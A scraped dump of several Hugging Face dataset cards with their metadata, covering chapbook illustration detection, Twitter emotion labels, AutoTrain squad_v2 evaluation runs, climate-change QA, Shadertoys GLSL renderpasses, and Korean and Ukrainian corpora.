These annotations provide bounding boxes around illustrations printed on a subset of the chapbook pages, created using a combination of manual annotation and machine classification, described in this paper.\n\n\nThe dataset also includes computationally inferred 'visual groupings' to which illustrated chapbook pages may belong. These groupings are based on the recurrence of illustrations on chapbook pages, as determined through the use of the VGG Image Search Engine (VISE) software",
"### Supported Tasks and Leaderboards\n\n\n* 'object-detection': the dataset contains bounding boxes for images contained in the Chapbooks\n* 'image-classification': a configuration for this dataset provides a classification label indicating if a page contains an illustration or not.\n* 'image-matching': a configuration for this dataset contains the annotations sorted into clusters or 'visual groupings' of illustrations that contain visually-matching content as determined by using the VGG Image Search Engine (VISE) software.\n\n\nThe performance on the 'object-detection' task reported in the paper Visual Analysis of Chapbooks Printed in Scotland is as follows:\n\n\nIOU threshold: 0.50, Precision: 0.993, Recall: 0.911\nIOU threshold: 0.75, Precision: 0.987, Recall: 0.905\nIOU threshold: 0.95, Precision: 0.973, Recall: 0.892\n\n\nThe performance on the 'image classification' task reported in the paper Visual Analysis of Chapbooks Printed in Scotland is as follows:\n\n\nImages in original dataset: 47329\nNumbers of images on which at least one illustration was detected: 3629\n\n\nNote that these figures do not represent images that contained multiple detections.\n\n\nSee the paper for examples of false-positive detections.\n\n\nThe performance on the 'image-matching' task is undergoing evaluation.",
"### Languages\n\n\nText accompanying the illustrations is in English, Scots or Scottish Gaelic.\n\n\nDataset Structure\n-----------------",
"### Data Instances\n\n\nAn example instance from the 'illustration-detection' split:\n\n\nAn example instance from the 'image-classification' split:\n\n\nAn example from the 'image-matching' split:",
"### Data Fields\n\n\nThe fields for the 'illustration-detection' config:\n\n\n* image\\_id: id for the image\n* height: height of the image\n* width: width of the image\n* image: image of the chapbook page\n* objects: annotations in COCO format, consisting of a list containing dictionaries with the following keys:\n\t+ bbox: bounding boxes for the images\n\t+ category\\_id: a label for the image\n\t+ image\\_id: id for the image\n\t+ iscrowd: COCO is a crowd flag\n\t+ segmentation: COCO segmentation annotations (empty in this case but kept for compatibility with other processing scripts)\n\n\nThe fields for the 'image-classification' config:\n\n\n* image: image\n* label: a label indicating if the page contains an illustration or not\n\n\nThe fields for the 'image-matching' config:\n\n\n* image: image of the chapbook page\n* label: an id for a particular instance of an image i.e. the same images will share the same id.",
"### Data Splits\n\n\nThere is a single split 'train' for all configs. K-fold validation was used in the paper describing this dataset, so no existing splits were defined.\n\n\nDataset Creation\n----------------",
"### Curation Rationale\n\n\nThe dataset was created to facilitate research into Scottish chapbook illustration and publishing. Detected illustrations can be browsed under publication metadata: together with the use of VGG Image Search Engine (VISE) software, this allows researchers to identify matching imagery and to infer the source of a chapbook from partial evidence. This browse and search functionality is available in this public demo documented here",
"### Source Data",
"#### Initial Data Collection and Normalization\n\n\nThe initial data was taken from the National Library of Scotland's Chapbooks Printed in Scotland dataset No normalisation was performed, but only the images and a subset of the metadata was used. OCR text was not used.",
"#### Who are the source language producers?\n\n\nThe initial dataset was created by the National Library of Scotland from scans and in-house curated catalogue descriptions for the NLS Data Foundry under the direction of Dr. Sarah Ames.\n\n\nThis subset of the data was created by Dr. Giles Bergel and Dr. Abhishek Dutta using a combination of manual annotation and machine classification, described below.",
"### Annotations",
"#### Annotation process\n\n\nAnnotation was initially performed on a subset of 337 of the 47329 images, using the VGG List Annotator (LISA software. Detected illustrations, displayed as annotations in LISA, were reviewed and refined in a number of passes (see this paper for more details). Initial detections were performed with an EfficientDet object detector trained on COCO, the annotation of which is described in this paper",
"#### Who are the annotators?\n\n\nAbhishek Dutta created the initial 337 annotations for retraining the EfficentDet model. Detections were reviewed and in some cases revised by Giles Bergel.",
"### Personal and Sensitive Information\n\n\nNone\n\n\nConsiderations for Using the Data\n---------------------------------",
"### Social Impact of Dataset\n\n\nWe believe this dataset will assist in the training and benchmarking of illustration detectors. It is hoped that by automating a task that would otherwise require manual annotation it will save researchers time and labour in preparing data for both machine and human analysis. The dataset in question is based on a category of popular literature that reflected the learning, tastes and cultural faculties of both its large audiences and its largely-unknown creators - we hope that its use, reuse and adaptation will highlight the importance of cheap chapbooks in the spread of literature, knowledge and entertainment in both urban and rural regions of Scotland and the United Kingdom during this period.",
"### Discussion of Biases\n\n\nWhile the original Chapbooks Printed in Scotland is the largest single collection of digitised chapbooks, it is as yet unknown if it is fully representative of all chapbooks printed in Scotland, or of cheap printed literature in general. It is known that a small number of chapbooks (less than 0.1%) within the original collection were not printed in Scotland but this is not expected to have a significant impact on the profile of the collection as a representation of the population of chapbooks as a whole.\n\n\nThe definition of an illustration as opposed to an ornament or other non-textual printed feature is somewhat arbitrary: edge-cases were evaluated by conformance with features that are most characteristic of the chapbook genre as a whole in terms of content, style or placement on the page.\n\n\nAs there is no consensus definition of the chapbook even among domain specialists, the composition of the original dataset is based on the judgement of those who assembled and curated the original collection.",
"### Other Known Limitations\n\n\nWithin this dataset, illustrations are repeatedly reused to an unusually high degree compared to other printed forms. The positioning of illustrations on the page and the size and format of chapbooks as a whole is also characteristic of the chapbook format in particular. The extent to which these annotations may be generalised to other printed works is under evaluation: initial results have been promising for other letterpress illustrations surrounded by texts.\n\n\nAdditional Information\n----------------------",
"### Dataset Curators\n\n\n* Giles Bergel\n* Abhishek Dutta",
"### Licensing Information\n\n\nIn accordance with the original data, this dataset is in the public domain.",
"### Contributions\n\n\nThanks to @davanstrien and Giles Bergel for adding this dataset."
] |
7b56660696f0df6adba35ef2d89e7bd549a2b409 |
A dataset of English Twitter messages labelled with six basic emotions (anger, fear, joy, love, sadness, and surprise).
GitHub link: https://github.com/dair-ai/emotion_dataset
| ttxy/emotion | [
"task_categories:text-classification",
"language:code",
"license:bsd",
"classification",
"region:us"
] | 2022-07-24T05:00:03+00:00 | {"language": ["code"], "license": "bsd", "task_categories": ["text-classification"], "pretty_name": "English Emotion classification", "tags": ["classification"]} | 2023-08-17T01:25:59+00:00 | [] | [
"code"
] | TAGS
#task_categories-text-classification #language-code #license-bsd #classification #region-us
|
A dataset of English Twitter messages labelled with six basic emotions (anger, fear, joy, love, sadness, and surprise).
GitHub link: URL
| [] | [
"TAGS\n#task_categories-text-classification #language-code #license-bsd #classification #region-us \n"
] |
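A minimal loading sketch for this row's repository. The split and column names are assumptions based on the upstream dair-ai emotion dataset; check the repository before relying on them.

```python
from datasets import load_dataset

# Repository id taken from this row; split and column names are assumed.
ds = load_dataset("ttxy/emotion", split="train")
print(ds[0])  # expected shape: {'text': '...', 'label': <0-5>}
```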
0bafa7af1ec5ff70f682f40196ebc18708f8d27f | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/minilm-uncased-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@ghpkishore](https://huggingface.co/ghpkishore) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-2eb94bfa-11695556 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-24T07:20:54+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/minilm-uncased-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-24T07:23:49+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: deepset/minilm-uncased-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @ghpkishore for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/minilm-uncased-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @ghpkishore for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/minilm-uncased-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @ghpkishore for evaluating this model."
] |
0012c270d0bd91ea80c924aa6dfdf9358394daa2 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/tinyroberta-6l-768d
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@ghpkishore](https://huggingface.co/ghpkishore) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-2eb94bfa-11695557 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-24T07:21:13+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/tinyroberta-6l-768d", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-24T07:25:16+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: deepset/tinyroberta-6l-768d
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @ghpkishore for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/tinyroberta-6l-768d\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @ghpkishore for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/tinyroberta-6l-768d\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @ghpkishore for evaluating this model."
] |
446bb59eac4bc07d261513dd87c75cc14d00df1b | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/xlm-roberta-base-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@ghpkishore](https://huggingface.co/ghpkishore) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-2eb94bfa-11695558 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-24T07:21:23+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/xlm-roberta-base-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-24T07:25:57+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: deepset/xlm-roberta-base-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @ghpkishore for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/xlm-roberta-base-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @ghpkishore for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/xlm-roberta-base-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @ghpkishore for evaluating this model."
] |
4eda02d5543e62650c00f8abd5b0cc1335b03088 | The Climate Change MRC dataset, also known as CCMRC, is a part of the work "Climate Bot: A Machine Reading Comprehension System for Climate Change Question Answering", accepted at IJCAI-ECAI 2022. The paper was accepted in the special system demo track "AI for Good".
If you use the dataset, cite the following paper:
```
@inproceedings{rony2022climatemrc,
title={Climate Bot: A Machine Reading Comprehension System for Climate Change Question Answering.},
author={Rony, Md Rashad Al Hasan and Zuo, Ying and Kovriguina, Liubov and Teucher, Roman and Lehmann, Jens},
booktitle={IJCAI},
year={2022}
}
```
| rony/climate-change-MRC | [
"license:mit",
"region:us"
] | 2022-07-24T10:22:03+00:00 | {"license": "mit"} | 2022-07-25T05:14:09+00:00 | [] | [] | TAGS
#license-mit #region-us
| The Climate Change MRC dataset, also known as CCMRC, is a part of the work "Climate Bot: A Machine Reading Comprehension System for Climate Change Question Answering", accepted at IJCAI-ECAI 2022. The paper was accepted in the special system demo track "AI for Good".
If you use the dataset, cite the following paper:
| [] | [
"TAGS\n#license-mit #region-us \n"
] |
796cb315ae0a504ac1b731a93216e019c2cd59a1 |
# Dataset Card for Shadertoys
## Table of Contents
- [Table of Contents](#table-of-contents)
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Source Data](#source-data)
- [Licensing Information](#licensing-information)
## Dataset Description
- **Repository:** https://github.com/Vipitis/project (private placeholder)
### Dataset Summary
The Shadertoys dataset contains over 44k renderpasses collected from the Shadertoy.com API. Some shader programs contain multiple render passes.
To browse a subset of this dataset, look at the [ShaderEval](https://huggingface.co/spaces/Vipitis/ShaderCoder) space. A finer variant of this dataset is [Shadertoys-fine](https://huggingface.co/datasets/Vipitis/Shadertoys-fine).
### Supported Tasks and Leaderboards
`text-generation`: the dataset can be used to train generative language models for code-completion tasks.
`ShaderEval` [task1](https://huggingface.co/spaces/Vipitis/ShaderEval) from ShaderEval uses a dataset derived from Shadertoys to test return completion of autoregressive language models.
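To make the return-completion idea concrete, here is a naive, illustrative sketch of how (prompt, target) pairs could be cut from raw shader code. The real ShaderEval task construction may differ; the function below is an assumption, not the benchmark's actual code.

```python
# Illustrative only -- not ShaderEval's actual pair construction.
def make_return_completion_pair(code: str):
    """Split shader code at its first return statement: everything before it
    becomes the prompt, the statement itself the completion target."""
    start = code.find("return")
    if start == -1:
        return None  # renderpass without a return statement
    end = code.find(";", start)
    if end == -1:
        return None
    return code[:start], code[start:end + 1]

pair = make_return_completion_pair("float f(float x){ return x * 2.0; }")
```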
### Languages
- English (title, description, tags, comments)
- Shadercode **programming** language, a subset of GLSL specifically for Shadertoy.com
## Dataset Structure
### Data Instances
A data point consists of the whole shadercode, some information from the API as well as additional metadata.
```
{
'num_passes': 1,
'has_inputs': False,
'name': 'Image',
'type': 'image',
'code': '<full code>',
'title': '<title of the shader>',
'description': '<description of the shader>',
'tags': ['tag1','tag2','tag3', ... ],
'license': 'unknown',
'author': '<username>',
'source': 'https://shadertoy.com/view/<shaderID>'
}
```
### Data Fields
- 'num_passes' number of passes the parent shader program has
- 'has_inputs' whether any inputs were used, such as textures or audio streams
- 'name' Name of the renderpass, usually Image, Buffer A, Common, etc.
- 'type' type of the renderpass; one of `{'buffer', 'common', 'cubemap', 'image', 'sound'}`
- 'code' the raw code (including comments) of the whole renderpass.
- 'title' Name of the Shader
- 'description' description given for the Shader
- 'tags' List of tags assigned to the Shader (by its creator); there are more than 10000 unique tags.
- 'license' currently in development
- 'author' username of the shader author
- 'source' URL to the shader. Not to the specific renderpass.
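As a usage sketch, the fields above can be filtered directly with the `datasets` library (repo id as given on this page):

```python
from datasets import load_dataset

shadertoys = load_dataset("Vipitis/Shadertoys")  # splits: train, test
# keep only 'image' renderpasses, one of the five 'type' values listed above
image_passes = shadertoys["train"].filter(lambda ex: ex["type"] == "image")
print(len(image_passes), image_passes[0]["title"], image_passes[0]["source"])
```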
### Data Splits
Currently available (shuffled):
- train (85.0%)
- test (15.0%)
## Dataset Creation
Data retrieved starting 2022-07-20
### Source Data
#### Initial Data Collection and Normalization
All data was collected via the [Shadertoy.com API](https://www.shadertoy.com/howto#q2); the collection script then iterated over the items in 'renderpass' while adding some of the fields from 'info'.
The code to generate these datasets should be published on the GitHub repository in the near future.
#### Who are the source language producers?
Shadertoy.com contributors who publish shaders as 'public+API'
## Licensing Information
The Default [license for each Shader](https://www.shadertoy.com/terms) is CC BY-NC-SA 3.0. However, some Shaders might have a different license attached.
The Dataset is currently not filtering for any licenses but gives a license tag, if easily recognizable by naive means.
Please check the first comment of each shader program yourself so as not to violate any copyrights in downstream use. The main license requires share-alike and attribution.
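A naive helper for pulling that first comment out of a renderpass is sketched below; it is an assumption that the license notice, when present, sits in the first `//` or `/* */` comment, so treat the result as a hint, not a verdict.

```python
import re

def first_comment(code: str):
    """Return the first line or block comment in shader code, if any.
    License notices often -- but not always -- live here."""
    match = re.search(r"//[^\n]*|/\*.*?\*/", code, flags=re.S)
    return match.group(0) if match else None
```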
Attribution of every data field can be found in the 'author' column, but might not include further attribution within the code itself or parents from forked shaders. | Vipitis/Shadertoys | [
"task_categories:text-generation",
"task_categories:text-to-image",
"annotations_creators:no-annotation",
"language_creators:machine-generated",
"size_categories:10K<n<100K",
"language:en",
"language:code",
"license:cc-by-nc-sa-3.0",
"code",
"region:us"
] | 2022-07-24T14:08:41+00:00 | {"annotations_creators": ["no-annotation"], "language_creators": ["machine-generated"], "language": ["en", "code"], "license": ["cc-by-nc-sa-3.0"], "multilinguality": [], "size_categories": ["10K<n<100K"], "source_datasets": [], "task_categories": ["text-generation", "text-to-image"], "task_ids": [], "pretty_name": "Shadertoys", "tags": ["code"], "dataset_info": {"features": [{"name": "num_passes", "dtype": "int64"}, {"name": "has_inputs", "dtype": "bool"}, {"name": "name", "dtype": "string"}, {"name": "type", "dtype": "string"}, {"name": "code", "dtype": "string"}, {"name": "title", "dtype": "string"}, {"name": "description", "dtype": "string"}, {"name": "tags", "sequence": "string"}, {"name": "author", "dtype": "string"}, {"name": "license", "dtype": "string"}, {"name": "source", "dtype": "string"}], "splits": [{"name": "train", "num_bytes": 162960894, "num_examples": 37841}, {"name": "test", "num_bytes": 26450429, "num_examples": 6617}], "download_size": 86294414, "dataset_size": 189411323}} | 2023-06-26T18:04:58+00:00 | [] | [
"en",
"code"
] | TAGS
#task_categories-text-generation #task_categories-text-to-image #annotations_creators-no-annotation #language_creators-machine-generated #size_categories-10K<n<100K #language-English #language-code #license-cc-by-nc-sa-3.0 #code #region-us
|
# Dataset Card for Shadertoys
## Table of Contents
- Table of Contents
- Dataset Description
- Dataset Summary
- Supported Tasks and Leaderboards
- Languages
- Dataset Structure
- Data Instances
- Data Fields
- Data Splits
- Dataset Creation
- Source Data
- Licensing Information
## Dataset Description
- Repository: URL (private placeholder)
### Dataset Summary
The Shadertoys dataset contains over 44k renderpasses collected from the URL API. Some shader programs contain multiple render passes.
To browse a subset of this dataset, look at the ShaderEval space. A finer variant of this dataset is Shadertoys-fine.
### Supported Tasks and Leaderboards
 'text-generation': the dataset can be used to train generative language models for code-completion tasks.
'ShaderEval' task1 from ShaderEval uses a dataset derived from Shadertoys to test return completion of autoregressive language models.
### Languages
- English (title, description, tags, comments)
- Shadercode programming language, a subset of GLSL specifically for URL
## Dataset Structure
### Data Instances
A data point consists of the whole shadercode, some information from the API as well as additional metadata.
### Data Fields
- 'num_passes' number of passes the parent shader program has
- 'has_inputs' whether any inputs were used, such as textures or audio streams
- 'name' Name of the renderpass, usually Image, Buffer A, Common, etc.
- 'type' type of the renderpass; one of '{'buffer', 'common', 'cubemap', 'image', 'sound'}'
- 'code' the raw code (including comments) of the whole renderpass.
- 'title' Name of the Shader
- 'description' description given for the Shader
- 'tags' List of tags assigned to the Shader (by its creator); there are more than 10000 unique tags.
- 'license' currently in development
- 'author' username of the shader author
- 'source' URL to the shader. Not to the specific renderpass.
### Data Splits
Currently available (shuffled):
- train (85.0%)
- test (15.0%)
## Dataset Creation
Data retrieved starting 2022-07-20
### Source Data
#### Initial Data Collection and Normalization
All data was collected via the URL API; the collection script then iterated over the items in 'renderpass' while adding some of the fields from 'info'.
The code to generate these datasets should be published on the GitHub repository in the near future.
#### Who are the source language producers?
URL contributors who publish shaders as 'public+API'
## Licensing Information
The Default license for each Shader is CC BY-NC-SA 3.0. However, some Shaders might have a different license attached.
The Dataset is currently not filtering for any licenses but gives a license tag, if easily recognizable by naive means.
Please check the first comment of each shader program yourself so as not to violate any copyrights in downstream use. The main license requires share-alike and attribution.
Attribution of every data field can be found in the 'author' column, but might not include further attribution within the code itself or parents from forked shaders. | [
"# Dataset Card for Shadertoys",
"## Table of Contents\n- Table of Contents\n- Dataset Description\n - Dataset Summary\n - Supported Tasks and Leaderboards\n - Languages\n- Dataset Structure\n - Data Instances\n - Data Fields\n - Data Splits\n- Dataset Creation\n - Source Data\n- Licensing Information",
"## Dataset Description\n\n- Repository: URL (private placeholder)",
"### Dataset Summary\n\nThe Shadertoys dataset contains over 44k renderpasses collected from the URL API. Some shader programm contain multiple render passes.\nTo browse a subset of this dataset, look at the ShaderEval space. A finer variant of this dataset is Shadertoys-fine.",
"### Supported Tasks and Leaderboards\n\n 'text-generation' the dataset can be used to train generative language models, for code completion tasks.\n 'ShaderEval' task1 from ShaderEval uses a dataset derived from Shadertoys to test return completion of autoregressive language models.",
"### Languages\n\n- English (title, description, tags, comments)\n- Shadercode programming language, a subset of GLSL specifically for URL",
"## Dataset Structure",
"### Data Instances\n\nA data point consists of the whole shadercode, some information from the API as well as additional metadata.",
"### Data Fields\n- 'num_passes' number of passes the parent shader program has\n- 'has_inputs' if any inputs were used like textures, audio streams,\n- 'name' Name of the renderpass, usually Image, Buffer A, Common, etc\n- 'type' type of the renderpass; one of '{'buffer', 'common', 'cubemap', 'image', 'sound'}'\n- 'code' the raw code (including comments) the whole renderpass.\n- 'title' Name of the Shader\n- 'description' description given for the Shader\n- 'tags' List of tags assigned to the Shader (by it's creator); there are more than 10000 unique tags.\n- 'license' currently in development\n- 'author' username of the shader author\n- 'source' URL to the shader. Not to the specific renderpass.",
"### Data Splits\n\nCurrently available (shuffled):\n - train (85.0%)\n - test (15.0%)",
"## Dataset Creation\n\nData retrieved starting 2022-07-20",
"### Source Data",
"#### Initial Data Collection and Normalization\n\nAll data was collected via the URL API and then iterated over the items in 'renderpass' while adding some of the fields from 'info'.\nThe code to generate these datasets should be published on the GitHub repository in the near future.",
"#### Who are the source language producers?\n\nURL contributers which publish shaders as 'public+API'",
"## Licensing Information\n\nThe Default license for each Shader is CC BY-NC-SA 3.0. However, some Shaders might have a different license attached.\nThe Dataset is currently not filtering for any licenses but gives a license tag, if easily recognizeable by naive means.\nPlease check the first comment of each shader program yourself as to not violate any copyrights for downstream use. The main license requires share alike and by attribution.\nAttribution of every data field can be found in the 'author' column, but might not include further attribution within the code itself or parents from forked shaders."
] | [
"TAGS\n#task_categories-text-generation #task_categories-text-to-image #annotations_creators-no-annotation #language_creators-machine-generated #size_categories-10K<n<100K #language-English #language-code #license-cc-by-nc-sa-3.0 #code #region-us \n",
"# Dataset Card for Shadertoys",
"## Table of Contents\n- Table of Contents\n- Dataset Description\n - Dataset Summary\n - Supported Tasks and Leaderboards\n - Languages\n- Dataset Structure\n - Data Instances\n - Data Fields\n - Data Splits\n- Dataset Creation\n - Source Data\n- Licensing Information",
"## Dataset Description\n\n- Repository: URL (private placeholder)",
"### Dataset Summary\n\nThe Shadertoys dataset contains over 44k renderpasses collected from the URL API. Some shader programm contain multiple render passes.\nTo browse a subset of this dataset, look at the ShaderEval space. A finer variant of this dataset is Shadertoys-fine.",
"### Supported Tasks and Leaderboards\n\n 'text-generation' the dataset can be used to train generative language models, for code completion tasks.\n 'ShaderEval' task1 from ShaderEval uses a dataset derived from Shadertoys to test return completion of autoregressive language models.",
"### Languages\n\n- English (title, description, tags, comments)\n- Shadercode programming language, a subset of GLSL specifically for URL",
"## Dataset Structure",
"### Data Instances\n\nA data point consists of the whole shadercode, some information from the API as well as additional metadata.",
"### Data Fields\n- 'num_passes' number of passes the parent shader program has\n- 'has_inputs' if any inputs were used like textures, audio streams,\n- 'name' Name of the renderpass, usually Image, Buffer A, Common, etc\n- 'type' type of the renderpass; one of '{'buffer', 'common', 'cubemap', 'image', 'sound'}'\n- 'code' the raw code (including comments) the whole renderpass.\n- 'title' Name of the Shader\n- 'description' description given for the Shader\n- 'tags' List of tags assigned to the Shader (by it's creator); there are more than 10000 unique tags.\n- 'license' currently in development\n- 'author' username of the shader author\n- 'source' URL to the shader. Not to the specific renderpass.",
"### Data Splits\n\nCurrently available (shuffled):\n - train (85.0%)\n - test (15.0%)",
"## Dataset Creation\n\nData retrieved starting 2022-07-20",
"### Source Data",
"#### Initial Data Collection and Normalization\n\nAll data was collected via the URL API and then iterated over the items in 'renderpass' while adding some of the fields from 'info'.\nThe code to generate these datasets should be published on the GitHub repository in the near future.",
"#### Who are the source language producers?\n\nURL contributers which publish shaders as 'public+API'",
"## Licensing Information\n\nThe Default license for each Shader is CC BY-NC-SA 3.0. However, some Shaders might have a different license attached.\nThe Dataset is currently not filtering for any licenses but gives a license tag, if easily recognizeable by naive means.\nPlease check the first comment of each shader program yourself as to not violate any copyrights for downstream use. The main license requires share alike and by attribution.\nAttribution of every data field can be found in the 'author' column, but might not include further attribution within the code itself or parents from forked shaders."
] |
3beff0e67d14889b60f313701a936360828e1283 |
This repository contains a slightly modified version of https://github.com/lang-uk/ukrainian-word-stress-dictionary to be used in Text-to-Speech project based on Tacoctron 2 | Yehor/uk-stresses | [
"uk",
"region:us"
] | 2022-07-24T19:54:28+00:00 | {"tags": ["uk"]} | 2022-07-28T12:57:39+00:00 | [] | [] | TAGS
#uk #region-us
|
This repository contains a slightly modified version of URL to be used in Text-to-Speech project based on Tacoctron 2 | [] | [
"TAGS\n#uk #region-us \n"
] |
47e32b8a853777f36903af82a1008f5d3f230d2a | - kowiki202206 corpus, one sentence per line
| bongsoo/kowiki20220620 | [
"language:ko",
"license:apache-2.0",
"region:us"
] | 2022-07-25T03:45:16+00:00 | {"language": ["ko"], "license": "apache-2.0"} | 2022-10-04T23:08:42+00:00 | [] | [
"ko"
] | TAGS
#language-Korean #license-apache-2.0 #region-us
| - kowiki202206 corpus, one sentence per line
| [] | [
"TAGS\n#language-Korean #license-apache-2.0 #region-us \n"
] |
79cedccdca57aee5a769b1898987f489c8aa3b8b | - Evaluation corpus | bongsoo/bongevalsmall | [
"language:ko",
"license:apache-2.0",
"region:us"
] | 2022-07-25T05:04:14+00:00 | {"language": ["ko"], "license": "apache-2.0"} | 2022-10-04T22:48:22+00:00 | [] | [
"ko"
] | TAGS
#language-Korean #license-apache-2.0 #region-us
| - Evaluation corpus | [] | [
"TAGS\n#language-Korean #license-apache-2.0 #region-us \n"
] |
8e5abafb2af8f768229735214b911e7aa9c7603b | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/xlm-roberta-large-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-fdec2e9c-11705559 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T06:24:04+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/xlm-roberta-large-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T06:29:26+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: deepset/xlm-roberta-large-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @sjrlee for evaluating this model. | [
